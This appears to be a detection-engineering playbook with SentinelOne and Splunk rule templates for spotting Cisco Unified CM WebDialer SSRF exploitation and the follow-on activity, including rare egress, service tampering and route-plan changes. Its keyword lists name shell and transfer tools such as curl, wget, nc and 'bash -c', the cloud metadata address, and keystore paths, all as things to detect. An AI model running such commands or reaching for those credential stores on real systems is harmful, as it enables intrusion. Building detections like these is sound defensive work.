"egress_not_in_voice_platform_baseline"
)
AND RareUnifiedCMEgress.DestinationContext IN ANY (
"destination_not_in_cucm_baseline",
"destination_not_in_voice_management_baseline",
"destination_not_in_directory_services_baseline",
"destination_not_in_dns_ntp_backup_baseline",
"destination_not_in_provider_support_baseline",
"destination_not_in_monitoring_baseline",
"newly_seen_destination",
"low_reputation_destination",
"unapproved_external_destination"
)
)
OR EVENT_NEAR WITHIN ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW (
ManagementOrConfigurationEvent AS VoiceControlPlaneChange
WHERE VoiceControlPlaneChange.RelatedUnifiedCMAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND VoiceControlPlaneChange.EventPattern IN ANY (
"cucm_file_created",
"cucm_file_modified",
"cucm_service_restart",
"cucm_administrative_configuration_change",
"cucm_route_plan_change",
"cucm_call_routing_change",
"new_cucm_administrator_created",
"cucm_administrator_modified",
"management_login_from_new_source",
"unusual_cluster_communication",
"voice_service_instability",
"unexpected_shell_activity"
)
AND VoiceControlPlaneChange.ChangeRisk IN ANY (
"appliance_integrity_change",
"voice_control_plane_change",
"call_routing_trust_change",
"administrative_trust_change",
"management_access_expansion",
"service_availability_risk",
"cluster_trust_change",
"configuration_integrity_risk",
"post_exploitation_indicator"
)
)
)
AND OPTIONAL_CONFIDENCE_INCREASE WITHIN ENV_CUCM_ADMIN_CONTEXT_WINDOW (
ManagementOrSecurityEvent AS AdministratorRiskContext
WHERE AdministratorRiskContext.RelatedUnifiedCMAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND AdministratorRiskContext.EventPattern IN ANY (
"new_administrator_created",
"rare_administrator_used",
"administrator_from_unusual_source",
"administrator_activity_outside_change_window",
"administrator_not_in_baseline",
"api_or_service_account_activity",
"session_anomaly",
"provider_managed_access_outside_expected_window"
)
)
AND OPTIONAL_CONFIDENCE_INCREASE WITHIN ENV_CUCM_IMPACT_FOLLOWON_WINDOW (
NetworkOrSecurityEvent AS VoicePlatformImpactContext
WHERE VoicePlatformImpactContext.RelatedAsset IN SAME_DESTINATION (
WebDialerUpstreamSuspiciousActivity.DestinationAsset
)
AND VoicePlatformImpactContext.EventPattern IN ANY (
"unusual_outbound_communication",
"additional_management_interface_access",
"high_value_system_access",
"directory_service_access_anomaly",
"backup_export_activity",
"monitoring_disruption",
"logging_gap",
"defensive_visibility_reduction",
"voice_service_restart",
"registration_anomaly",
"route_plan_instability",
"call_routing_anomaly"
)
)
AND NOT ChangeContext IN ANY (
"approved_voice_platform_maintenance",
"approved_webdialer_workflow",
"approved_click_to_call_workflow",
"approved_call_management_integration",
"approved_monitoring_activity",
"approved_provider_support",
"approved_patch_validation",
"approved_vulnerability_scanning",
"approved_backup_activity",
"approved_directory_integration",
"approved_cluster_maintenance",
"approved_route_plan_change",
"approved_service_restart",
"approved_incident_response",
"approved_emergency_remediation"
)

SentinelOne

Detection Viability Assessment

Production-ready where SentinelOne covers Cisco Unified CM / Unified CM SME appliances, supported Linux hosts, management jump systems, reverse-proxy hosts, load-balancer support systems, monitoring systems, backup systems, or file-integrity collection points that can be reliably mapped to Cisco Unified CM nodes, clusters, management interfaces, and voice-management segments.

Direct endpoint-agent coverage on Cisco Unified CM appliances may vary by customer support model, Cisco supportability constraints, and appliance operating model. Where SentinelOne cannot be deployed directly on Unified CM appliances, this rule must be implemented as appliance-adjacent correlation using management-host telemetry, reverse-proxy telemetry, jump-host telemetry, monitoring-host telemetry, backup-host telemetry, file-integrity telemetry, service-state telemetry, and Cisco Unified CM administrative audit enrichment. Do not represent adjacent-host coverage as direct appliance endpoint coverage unless the customer confirms supported telemetry from the appliance itself.

Rule

Cisco Unified CM WebDialer Follow-On File Modification, Service Manipulation, or Management-Host Execution

Rule Format

SentinelOne Deep Visibility / STAR logic template requiring local SentinelOne tenant syntax validation, event-type validation, field-name validation, Cisco Unified CM endpoint or management-host validation, WebDialer telemetry correlation, file-path validation, approved-maintenance exceptions, timing-window tuning, and environment-specific allowlisting before STAR promotion.

Detection Purpose

Detect suspicious file, process, service, shell, transfer-tool, network, or management-host behavior associated with possible Cisco Unified CM / Unified CM SME compromise after suspicious WebDialer activity, especially where appliance-side file modification, service manipulation, route-plan change, unexpected shell activity, rare egress, or management access from unfamiliar hosts may indicate post-exploitation behavior.

Detection Logic

Trigger when a Cisco Unified CM appliance, Unified CM SME appliance, confirmed management host, reverse-proxy host, load-balancer support host, monitoring host, backup host, jump server, or file-integrity collection point records suspicious process, command-line, file, service, or network behavior tied to Cisco Unified CM service context, WebDialer context, voice-management context, route-plan context, or administrative workflows.

Assign medium severity when suspicious file, process, service, or network behavior occurs on a Cisco Unified CM appliance or mapped voice-management asset outside approved maintenance.

Assign high severity when suspicious file, process, service, or network behavior aligns with WebDialer-related web activity, root or privileged context, service restart activity, configuration file access, certificate or key-store access, route-plan manipulation, call-control configuration change, rare egress, or management access from an unfamiliar source.

Promote to critical when suspicious activity is correlated within the local control-plane correlation window with suspicious WebDialer activity, confirmed SSRF-shaped WebDialer context, appliance-side file write, root-level activity, command execution, unauthorized administrator creation, route-plan change, service restart, credential or configuration access, call-routing integrity impact, or voice-service disruption on the same Cisco Unified CM node, cluster, management host, or voice-management segment.

Required Telemetry

SentinelOne process telemetry where deployable.

SentinelOne command-line telemetry where deployable.

SentinelOne parent-process telemetry where deployable.

SentinelOne file telemetry where deployable.

SentinelOne network telemetry where deployable.

Cisco Unified CM appliance endpoint group where supported.

Cisco Unified CM SME appliance endpoint group where supported.

Cisco Unified CM management-host endpoint group.

Cisco Unified CM reverse-proxy or load-balancer endpoint group.

Cisco Unified CM jump-host endpoint group.

Cisco Unified CM monitoring-host endpoint group.

Cisco Unified CM backup-host endpoint group.

Cisco Unified CM file-integrity monitoring feed where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved voice administrator lookup.

Approved management-host lookup.

Approved provider-managed source lookup.

Approved maintenance-user lookup.

Approved service-management command lookup.

Approved backup job lookup.

Approved monitoring job lookup.

Approved patch-validation workflow lookup.

Approved incident-response workflow lookup.

Approved maintenance-window lookup.

Approved egress-destination lookup.

Engineering Implementation Instructions

Map EndpointName, EndpointId, AgentUuid, ParentProcessName, ProcessName, CommandLine, FilePath, EventType, EventPattern, DstIp, DstPort, DstDomain, EventTime, management_host_role, Cisco Unified CM cluster identifier, Cisco Unified CM node identifier, Cisco Unified CM role, appliance hostname, management IP, voice-management segment, service name, service action, route-plan object, call-routing change, and WebDialer correlation fields to the customer’s local SentinelOne and enrichment schema.

Create local asset groups for endpoint-visible Cisco Unified CM appliances, endpoint-visible Cisco Unified CM SME appliances, Cisco Unified CM management hosts, Cisco Unified CM reverse proxies, Cisco Unified CM load balancers, Cisco voice-management jump systems, Cisco voice-monitoring systems, Cisco backup systems, approved provider-managed systems, and confirmed file-integrity collection systems.

Validate whether SentinelOne is directly deployed on Cisco Unified CM / Unified CM SME appliances, only on adjacent management hosts, or only on proxy, jump, monitoring, backup, or file-integrity systems. Classify the final deployment as direct appliance endpoint detection, appliance-adjacent correlation, or management-plane support detection based on validated coverage.

Create exceptions for approved Cisco patching, backup jobs, certificate management, disaster recovery validation, service restarts, cluster maintenance, route-plan changes, provider-managed support, vulnerability validation, voice-monitoring jobs, call-routing changes, approved incident-response collection, and approved emergency remediation.

Do not suppress shell, Python, Perl, Bash, curl, wget, service, systemctl, file-read, or file-write behavior globally. Scope suppression to approved command patterns, approved users, approved management hosts, approved maintenance windows, approved provider workflows, and approved Cisco voice-platform operations.

Validate file telemetry for Cisco Unified CM configuration paths, service configuration files, certificate stores, key stores, temporary upload paths, web application paths, log directories, backup directories, export directories, route-plan exports, and locally defined file-integrity monitoring paths.

Validate network telemetry for rare egress from Unified CM appliances, management hosts, reverse-proxy hosts, monitoring hosts, backup hosts, or jump systems to destinations outside approved Cisco, provider, monitoring, call-control, backup, DNS, NTP, directory, certificate, and management destinations.

Join SentinelOne endpoint findings to WebDialer telemetry, Cisco Unified CM administrative audit logs, service-state telemetry, route-plan changes, file-integrity records, and voice-management asset inventory before promoting to high-confidence compromise detection.

Run in hunt mode before alert mode to baseline normal Cisco Unified CM service operations, certificate updates, backup jobs, monitoring checks, cluster communication, provider-managed support, patching, call-routing updates, vulnerability scanning, and emergency remediation.

Treat endpoint grouping, appliance-support validation, management-host role mapping, approved command exceptions, maintenance-window suppression, file-path validation, service-name validation, rare-egress baselining, false-positive testing, WebDialer correlation validation, and SOC alert routing as required local deployment work.

DRI Assessment

Moderate to high where SentinelOne covers Unified CM appliances or tightly mapped management hosts with process lineage, command-line, file, and network telemetry enabled. Resilience is lower where Cisco appliance internals are not directly monitored and coverage depends on reverse-proxy, jump-host, management-host, monitoring-host, backup-host, or file-integrity feeds.

DRI

8.1 / 10

TCR Assessment

Operational confidence is moderate for standalone appliance-adjacent process, file, service, or egress behavior and high when SentinelOne findings correlate with WebDialer URI activity, SSRF-shaped request context, administrative audit logs, file-integrity records, service-state changes, route-plan changes, or management logins from unfamiliar sources.

Operational TCR

7.9 / 10

Full-Telemetry TCR

9.0 / 10

Limitations

Direct endpoint telemetry may not be available on Cisco Unified CM or Unified CM SME appliances depending on supportability, operating model, and customer tooling. Legitimate Cisco patching, provider support, certificate management, backup operations, monitoring checks, disaster recovery validation, service restarts, route-plan changes, cluster maintenance, and emergency remediation may produce similar file, process, service, or egress behavior. This rule must be scoped to Cisco Unified CM appliances or confirmed management-plane assets and tuned against approved voice-platform workflows before alert-mode deployment.

Detection Query Pattern

SentinelOne Deep Visibility / STAR logic template for endpoint-visible Cisco Unified CM / Unified CM SME WebDialer follow-on file modification, service manipulation, suspicious process execution, and rare endpoint egress. This template requires SentinelOne tenant syntax validation, event-type validation, field-name validation, Cisco Unified CM endpoint or management-host validation, WebDialer telemetry correlation, file-path validation, timing-window tuning, and environment-specific allowlisting before STAR promotion.

EndpointEvent AS UnifiedCMWebDialerFollowOnHostActivity
WHERE UnifiedCMWebDialerFollowOnHostActivity.EndpointName IN ASSET_GROUP (
"Endpoint Visible Cisco Unified CM Appliances",
"Endpoint Visible Cisco Unified CM SME Appliances",
"Cisco Unified CM Management Hosts",
"Cisco Unified CM Reverse Proxy Hosts",
"Cisco Unified CM Load Balancer Support Hosts",
"Cisco Unified CM Jump Hosts",
"Cisco Unified CM Monitoring Hosts",
"Cisco Unified CM Backup Hosts",
"Cisco Unified CM File Integrity Collection Hosts",
"Cisco Voice Management Hosts"
)
AND (
UnifiedCMWebDialerFollowOnHostActivity.ParentProcessName IN ANY (
"webdialer",
"callmanager",
"tomcat",
"java",
"python",
"bash",
"sh",
"systemd",
"service-wrapper",
"cisco-service",
"voice-service",
"backup-service",
"monitoring-agent",
"provider-support-tool"
)
OR UnifiedCMWebDialerFollowOnHostActivity.EventPattern IN ANY (
"cucm_service_activity",
"webdialer_related_activity",
"callmanager_related_activity",
"tomcat_related_activity",
"voice_platform_service_activity",
"management_host_activity",
"provider_support_activity_outside_baseline"
)
)
AND UnifiedCMWebDialerFollowOnHostActivity.EventType IN ANY (
"File Creation",
"File Modification",
"File Permission Change",
"File Read",
"Archive Extraction",
"Process Creation",
"Process Network Connection",
"Service Modification",
"Service Restart",
"Scheduled Job Creation",
"Local User Modification",
"Credential Or Key Access",
"Configuration File Access"
)
AND (
UnifiedCMWebDialerFollowOnHostActivity.FilePath HAS_ANY (
"/tmp/",
"/var/tmp/",
"/dev/shm/",
"/usr/local/",
"/opt/",
"/var/log/",
"/backup/",
"/export/",
"/config/",
"/certificate/",
"/cert/",
"/key/",
"/keystore/",
"/truststore/",
"webdialer",
"callmanager",
"tomcat",
"route",
"dialplan"
)
OR UnifiedCMWebDialerFollowOnHostActivity.CommandLine HAS_ANY (
"webdialer",
"callmanager",
"tomcat",
"chmod ",
"chown ",
"curl ",
"wget ",
"nc ",
"ncat ",
"bash -c",
"/bin/sh -c",
"systemctl",
"service ",
"tar ",
"zip ",
"scp ",
"sftp ",
"whoami",
"uname",
"127.0.0.1",
"localhost",
"169.254.169.254"
)
OR UnifiedCMWebDialerFollowOnHostActivity.EventPattern IN ANY (
"unexpected_shell_execution",
"unexpected_interpreter_execution",
"unexpected_transfer_tool_execution",
"temporary_path_write",
"application_writable_path_write",
"configuration_file_access",
"certificate_or_key_access",
"route_plan_file_access",
"backup_export_activity",
"service_modification",
"service_restart",
"local_user_change",
"rare_process_network_connection",
"new_destination_for_voice_management_host"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_WEBDIALER_CORRELATION_WINDOW (
ManagementOrNetworkEvent AS WebDialerManagementContext
WHERE WebDialerManagementContext.RelatedAsset IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND WebDialerManagementContext.EventPattern IN ANY (
"abnormal_webdialer_access",
"webdialer_request_from_unapproved_source",
"webdialer_access_outside_click_to_call_workflow",
"webdialer_backend_fetch_behavior",
"ssrf_shaped_webdialer_request",
"webdialer_response_anomaly",
"webdialer_failure_to_success_pattern",
"suspicious_source_to_voice_management_plane"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_HOST_FOLLOWON_WINDOW (
EndpointEvent AS UnifiedCMHostFollowOn
WHERE UnifiedCMHostFollowOn.EndpointName IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND UnifiedCMHostFollowOn.EventPattern IN ANY (
"root_context_activity",
"privileged_execution",
"outbound_process_network_connection",
"rare_external_destination",
"administrator_state_change",
"service_state_change",
"route_plan_change",
"call_routing_change",
"backup_export_activity",
"configuration_change",
"voice_service_instability",
"downstream_voice_control_activity"
)
)
AND OPTIONAL_CORRELATION WITHIN ENV_CUCM_ADMIN_CONTEXT_WINDOW (
ManagementOrSecurityEvent AS UnifiedCMAdministratorContext
WHERE UnifiedCMAdministratorContext.RelatedAsset IN SAME_VOICE_PLATFORM_SCOPE (
UnifiedCMWebDialerFollowOnHostActivity.EndpointName
)
AND UnifiedCMAdministratorContext.EventPattern IN ANY (
"new_administrator_created",
"rare_administrator_used",
"administrator_from_unusual_source",
"administrator_activity_outside_change_window",
"administrator_not_in_baseline",
"api_or_service_account_activity",
"session_anomaly",
"provider_managed_access_outside_expected_window"
)
)
AND NOT ChangeContext IN ANY (
"approved_voice_platform_maintenance",
"approved_webdialer_workflow",
"approved_click_to_call_workflow",
"approved_call_management_integration",
"approved_monitoring_activity",
"approved_provider_support",
"approved_patch_validation",
"approved_vulnerability_scanning",
"approved_backup_activity",
"approved_certificate_management",
"approved_directory_integration",
"approved_cluster_maintenance",
"approved_route_plan_change",
"approved_service_restart",
"approved_incident_response",
"approved_emergency_remediation"
)

Splunk

Detection Viability Assessment

Production-ready as a Splunk summary-correlation rule where Cisco Unified CM / Unified CM SME WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement state, source reputation, approved-source context, rare egress context, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry can be normalized into scheduled candidate summaries.

This rule should not be deployed as a broad raw-index join across high-volume proxy, firewall, web, DNS, endpoint, and administrative telemetry. Production deployment should use scheduled candidate searches that populate summary indexes or accelerated datasets for suspicious WebDialer activity, rare Unified CM egress, and voice-control-plane change candidates. The final correlation search should operate on reduced candidate summaries and correlate them by Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.

Rule

Cisco Unified CM WebDialer SSRF Candidate Followed by Rare Egress or Voice-Control-Plane Change

Rule Format

Splunk SPL summary-correlation pattern requiring local index validation, sourcetype validation, macro validation, lookup validation, normalized field validation, summary-index validation, timing-window tuning, and environment-specific allowlisting before production deployment.

Detection Purpose

Detect suspicious Cisco Unified CM / Unified CM SME WebDialer activity that aligns with SSRF-shaped request behavior and is followed by rare outbound communication, administrative change, service manipulation, file activity, route-plan change, call-routing change, or voice-control-plane instability tied to the same Cisco Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management scope.

Detection Logic

Trigger when a scheduled WebDialer candidate summary identifies suspicious WebDialer access against a Cisco Unified CM or Unified CM SME asset with WebDialer enabled, especially when the request includes abnormal WebDialer paths, unapproved source context, SSRF-shaped parameter indicators, backend fetch behavior, abnormal response transitions, failure-to-success patterns, or source reputation risk.

Assign medium severity when suspicious WebDialer activity occurs against a Unified CM or Unified CM SME asset outside approved WebDialer workflows, monitoring, provider support, vulnerability scanning, patch validation, or maintenance.

Assign high severity when suspicious WebDialer activity is followed within the local rare-egress correlation window by rare outbound communication from the same Unified CM node, Unified CM SME node, backend host, management interface, NAT egress identity, or voice-management segment.

Assign high severity when suspicious WebDialer activity is followed within the local control-plane correlation window by administrative configuration change, service restart, file creation, file modification, route-plan change, call-routing change, abnormal management login, unusual cluster communication, voice-service instability, or unexpected shell activity tied to the same Unified CM node, cluster, backend host, management subnet, administrative identity, or voice-management scope.

Promote to critical when suspicious WebDialer activity converges with rare egress and control-plane change, or when correlated telemetry confirms appliance-side compromise evidence, unauthorized administrator creation, malicious route-plan change, service manipulation, file-write activity, command execution, voice-control-plane instability, or call-routing integrity impact.

Required Telemetry

Splunk summary index or accelerated dataset for suspicious WebDialer activity.

Splunk summary index or accelerated dataset for rare Cisco Unified CM egress.

Splunk summary index or accelerated dataset for Cisco Unified CM control-plane change activity.

WAF logs.

Reverse-proxy logs.

Load-balancer logs.

Firewall logs.

Proxy logs.

DNS logs.

Cisco Unified CM or Unified CM SME access logs where available.

Cisco Unified CM administrative audit logs where available.

Cisco Unified CM service-status or service-restart telemetry where available.

Cisco Unified CM configuration-change telemetry where available.

Cisco Unified CM route-plan change telemetry where available.

Cisco Unified CM file-integrity telemetry where available.

Cisco Unified CM appliance inventory.

Cisco Unified CM SME appliance inventory.

Cisco Unified CM cluster and node inventory.

Cisco WebDialer enablement inventory.

Approved voice administrator source lookup.

Approved WebDialer workflow lookup.

Approved call-management integration lookup.

Approved monitoring source lookup.

Approved scanner lookup.

Approved provider-managed source lookup.

Approved patch-validation source lookup.

Approved maintenance-window lookup.

Approved Cisco Unified CM asset lookup.

Approved Cisco Unified CM SME asset lookup.

Approved voice-management subnet lookup.

Approved Cisco Unified CM egress destination lookup.

Source reputation lookup.

Recently seen destination-domain and destination-IP baseline.

Engineering Implementation Instructions

Create scheduled candidate searches that populate cucm_webdialer_suspicious_activity_summary, cucm_rare_egress_summary, and cucm_control_plane_change_summary before enabling the final correlation search.

Map source IP, forwarded source IP, normalized source IP, destination host, destination IP, backend host, backend IP, virtual host, URI path, query string, full URL, HTTP method, HTTP status, request size, response size, user agent, WebDialer endpoint category, SSRF parameter indicator, source reputation, destination reputation, DNS query, proxy action, firewall action, NAT egress identity, Cisco Unified CM node, Cisco Unified CM SME node, Cisco Unified CM cluster, voice-management segment, administrator, administrative action, service name, service action, file path, file action, route-plan object, call-routing change, and event timestamp fields to the customer’s local Splunk schema.

Use macros to abstract local index, sourcetype, data model, and field mappings. Recommended macros include cucm_webdialer_candidate_summaries, cucm_rare_egress_summaries, cucm_control_plane_change_summaries, cucm_asset_lookup, cucm_source_reputation_lookup, cucm_allowed_context_lookup, and cucm_summary_time_bounds.

Validate summary population before alert-mode deployment. The final correlation should operate on summary data rather than broad raw telemetry.

Build and validate lookups for Cisco Unified CM assets, Unified CM SME assets, WebDialer-enabled assets, voice-management segments, approved administrators, approved WebDialer workflows, approved call-management integrations, approved monitoring sources, approved scanner sources, approved provider-managed sources, approved patch-validation sources, approved maintenance windows, approved egress destinations, approved route-plan changes, approved service restarts, approved backup jobs, and approved emergency remediation.

Normalize Unified CM correlation identity with a stable cucm_scope field. The field should resolve to the best available shared scope across Unified CM node, Unified CM SME node, cluster, backend host, management interface, NAT egress identity, or voice-management segment.

Avoid raw joins, large subsearch membership checks, unbounded transaction commands, and broad negative filters over high-volume proxy, DNS, firewall, web, and endpoint indexes. Use summary indexes, accelerated datasets, lookups, bounded time windows, candidate-specific fields, and eventstats over reduced candidate sets.

Run in hunt mode before alert mode to baseline approved WebDialer use, click-to-call workflows, monitoring activity, scanner activity, provider-managed access, patch validation, maintenance activity, call-management integrations, directory integration, backup activity, route-plan changes, cluster communication, and expected voice-platform egress.

Treat macro validation, lookup freshness, summary-index completeness, field normalization, time-window tuning, allowlist quality, false-positive testing, and SOC triage output fields as required local deployment work.

DRI Assessment

High resilience where WebDialer activity, Cisco Unified CM asset inventory, WebDialer enablement inventory, source reputation, rare egress baselines, administrative audit telemetry, service-state telemetry, file-integrity telemetry, and route-plan change telemetry are normalized into reliable summaries. Resilience is lower where WebDialer URI visibility, Unified CM administrative telemetry, or stable Unified CM scope mapping is unavailable.

DRI

8.7 / 10

TCR Assessment

Operational confidence is moderate for standalone suspicious WebDialer activity and high when WebDialer candidates correlate with rare egress, administrative change, file modification, service restart, route-plan change, call-routing change, abnormal management login, voice-service instability, or confirmed appliance-side compromise indicators.

Operational TCR

8.4 / 10

Full-Telemetry TCR

9.3 / 10

Limitations

This rule depends on summary-search quality, URI-preserving WebDialer telemetry, Unified CM asset inventory, stable correlation scope, and local allowlist freshness. Encrypted traffic without HTTP metadata, missing WebDialer logs, incomplete administrative audit telemetry, stale asset inventory, or unreliable NAT/backend mapping may reduce confidence. Legitimate click-to-call workflows, provider support, vulnerability scanning, patch validation, backup operations, certificate management, route-plan changes, service restarts, cluster maintenance, and emergency remediation may produce similar activity and must be tuned before alert-mode deployment.

Detection Query Pattern

Splunk SPL summary-correlation pattern for Cisco Unified CM / Unified CM SME WebDialer SSRF-shaped activity followed by the first valid rare-egress or voice-control-plane change event that occurs after the WebDialer activity. This pattern assumes scheduled candidate searches populate cucm_webdialer_suspicious_activity_summary, cucm_rare_egress_summary, and cucm_control_plane_change_summary. Local index, sourcetype, macro, lookup, field-name, timing-window, summary-index, and data-model validation are required before production deployment.

index=summary source=cucm_webdialer_suspicious_activity_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="webdialer_suspicious_activity", webdialer_time=_time
| eval cucm_scope=coalesce(cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, backend_host, dest_host, dest, host, dvc, device_name, nat_egress_identity, voice_management_segment)
| eval webdialer_src_ip=src_ip, webdialer_forwarded_src_ip=forwarded_src_ip
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role, webdialer_enabled
| lookup cucm_approved_webdialer_sources src_ip AS webdialer_src_ip OUTPUT is_approved_webdialer_source, approved_source_type
| lookup cucm_approved_admin_sources src_ip AS webdialer_src_ip OUTPUT is_approved_admin_source, approved_admin_source_type
| lookup source_reputation src_ip AS webdialer_src_ip OUTPUT source_reputation, source_asn, source_geo, is_hosting_provider, is_residential_proxy, is_suspicious_asn
| lookup cucm_change_context cucm_scope AS cucm_scope OUTPUT is_approved_change, approved_change_type, change_window
| fillnull value="false" is_cucm_asset webdialer_enabled is_approved_webdialer_source is_approved_admin_source is_hosting_provider is_residential_proxy is_suspicious_asn is_approved_change
| where is_cucm_asset="true" AND webdialer_enabled="true"
| eval ssrf_request_indicator=if(is_loopback_reference="true" OR is_link_local_reference="true" OR is_private_address_reference="true" OR is_internal_hostname_reference="true" OR is_nested_url_parameter="true" OR is_unexpected_url_scheme="true" OR is_encoded_url_scheme="true" OR is_double_encoded_destination="true" OR is_backend_fetch_error="true" OR is_host_header_anomaly="true", 1, 0)
| eval webdialer_source_risk=if(is_approved_webdialer_source!="true" AND is_approved_admin_source!="true", 1, 0)
| eval webdialer_reputation_risk=if(is_hosting_provider="true" OR is_residential_proxy="true" OR is_suspicious_asn="true", 1, 0)
| eval webdialer_behavior_risk=if(webdialer_event_type IN ("abnormal_webdialer_access","webdialer_request_from_unapproved_source","webdialer_access_outside_click_to_call_workflow","webdialer_backend_fetch_behavior","webdialer_response_anomaly","webdialer_failure_to_success_pattern","suspicious_source_to_voice_management_plane") OR ssrf_request_indicator=1 OR webdialer_source_risk=1 OR webdialer_reputation_risk=1, 1, 0)
| where webdialer_behavior_risk=1 AND is_approved_change!="true"
| fields candidate_type, webdialer_time, cucm_scope, cucm_asset_role, webdialer_src_ip, webdialer_forwarded_src_ip, http_method, uri_path, query_string, full_url, http_status, user_agent, request_size, response_size, webdialer_event_type, ssrf_request_indicator, webdialer_source_risk, webdialer_reputation_risk, source_reputation, source_asn, source_geo, approved_source_type, approved_admin_source_type, approved_change_type, change_window
| append [
search index=summary source=cucm_rare_egress_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="rare_cucm_egress", rare_egress_time=_time
| eval cucm_scope=coalesce(cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, source_host, src_host, host, dvc, device_name, nat_egress_identity, voice_management_segment)
| eval egress_src_ip=src_ip, egress_src_host=src_host, egress_dest_ip=dest_ip, egress_dest_domain=dest_domain, egress_dest_port=dest_port
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role
| lookup cucm_approved_egress_destinations dest_ip AS egress_dest_ip OUTPUT is_approved_egress_ip, approved_egress_type
| lookup cucm_approved_egress_domains dest_domain AS egress_dest_domain OUTPUT is_approved_egress_domain, approved_egress_domain_type
| lookup destination_reputation dest_domain AS egress_dest_domain OUTPUT destination_reputation, destination_category, destination_first_seen
| fillnull value="false" is_cucm_asset is_approved_egress_ip is_approved_egress_domain
| where is_cucm_asset="true"
| eval rare_egress_risk=if(is_approved_egress_ip!="true" AND is_approved_egress_domain!="true" AND (is_new_destination_for_cucm_node="true" OR is_new_destination_for_voice_management_segment="true" OR destination_reputation IN ("unknown","suspicious","malicious") OR egress_event_type IN ("rare_outbound_connection","unexpected_external_egress","unexpected_dns_resolution","connection_to_unapproved_destination","connection_to_unknown_reputation_destination","connection_to_suspicious_reputation_destination","egress_not_in_voice_platform_baseline")), 1, 0)
| where rare_egress_risk=1
| fields candidate_type, rare_egress_time, cucm_scope, cucm_asset_role, egress_src_ip, egress_src_host, egress_dest_ip, egress_dest_domain, egress_dest_port, transport, egress_event_type, destination_reputation, destination_category, destination_first_seen, approved_egress_type, approved_egress_domain_type
]
| append [
search index=summary source=cucm_control_plane_change_summary earliest=-ENV_CUCM_CORRELATION_LOOKBACK latest=now
| eval candidate_type="cucm_control_plane_change", control_change_time=_time
| eval cucm_scope=coalesce(cucm_scope, related_cucm_scope, cucm_cluster_id, cucm_node_id, cucm_asset, related_cucm_asset, management_host, host, dvc, device_name, voice_management_segment)
| eval control_src_ip=src_ip, control_management_host=management_host
| lookup cucm_assets cucm_scope AS cucm_scope OUTPUT is_cucm_asset, cucm_asset_role
| lookup cucm_approved_admins administrator AS administrator OUTPUT is_approved_administrator, administrator_role
| lookup cucm_approved_change_types change_type AS change_type OUTPUT is_approved_change_type, approved_change_type
| lookup cucm_change_context cucm_scope AS cucm_scope OUTPUT is_approved_change, approved_context_type, change_window
| fillnull value="false" is_cucm_asset is_approved_administrator is_approved_change_type is_approved_change
| where is_cucm_asset="true"
| eval control_plane_risk=if(control_event_type IN ("cucm_file_created","cucm_file_modified","cucm_service_restart","cucm_administrative_configuration_change","cucm_route_plan_change","cucm_call_routing_change","new_cucm_administrator_created","cucm_administrator_modified","management_login_from_new_source","unusual_cluster_communication","voice_service_instability","unexpected_shell_activity") AND is_approved_change!="true" AND is_approved_change_type!="true", 1, 0)
| where control_plane_risk=1
| fields candidate_type, control_change_time, cucm_scope, cucm_asset_role, administrator, administrator_role, control_src_ip, control_management_host, service_name, service_action, file_path, file_action, route_plan_object, call_routing_change, change_type, control_event_type, approved_context_type, change_window
]
| eventstats min(webdialer_time) AS first_webdialer_time values(uri_path) AS webdialer_paths values(query_string) AS webdialer_queries values(full_url) AS webdialer_urls values(webdialer_event_type) AS webdialer_event_types values(webdialer_src_ip) AS webdialer_sources values(webdialer_forwarded_src_ip) AS forwarded_webdialer_sources values(source_asn) AS webdialer_source_asns values(source_geo) AS webdialer_source_geos values(ssrf_request_indicator) AS ssrf_request_indicators values(webdialer_source_risk) AS webdialer_source_risks values(webdialer_reputation_risk) AS webdialer_reputation_risks by cucm_scope
| where isnotnull(first_webdialer_time)
| eval valid_rare_egress_time=if(isnotnull(rare_egress_time) AND rare_egress_time>=first_webdialer_time AND rare_egress_time-first_webdialer_time<=ENV_CUCM_RARE_EGRESS_WINDOW, rare_egress_time, null())
| eval valid_control_change_time=if(isnotnull(control_change_time) AND control_change_time>=first_webdialer_time AND control_change_time-first_webdialer_time<=ENV_CUCM_CONTROL_PLANE_CHANGE_WINDOW, control_change_time, null())
| eval valid_rare_egress_dest_ip=if(isnotnull(valid_rare_egress_time), egress_dest_ip, null())
| eval valid_rare_egress_dest_domain=if(isnotnull(valid_rare_egress_time), egress_dest_domain, null())
| eval valid_rare_egress_dest_port=if(isnotnull(valid_rare_egress_time), egress_dest_port, null())
| eval valid_rare_egress_event_type=if(isnotnull(valid_rare_egress_time), egress_event_type, null())
| eval valid_rare_egress_reputation=if(isnotnull(valid_rare_egress_time), destination_reputation, null())
| eval valid_control_event_type=if(isnotnull(valid_control_change_time), control_event_type, null())
| eval valid_administrator=if(isnotnull(valid_control_change_time), administrator, null())
| eval valid_management_host=if(isnotnull(valid_control_change_time), control_management_host, null())
| eval valid_service_name=if(isnotnull(valid_control_change_time), service_name, null())
| eval valid_service_action=if(isnotnull(valid_control_change_time), service_action, null())
| eval valid_file_path=if(isnotnull(valid_control_change_time), file_path, null())
| eval valid_file_action=if(isnotnull(valid_control_change_time), file_action, null())
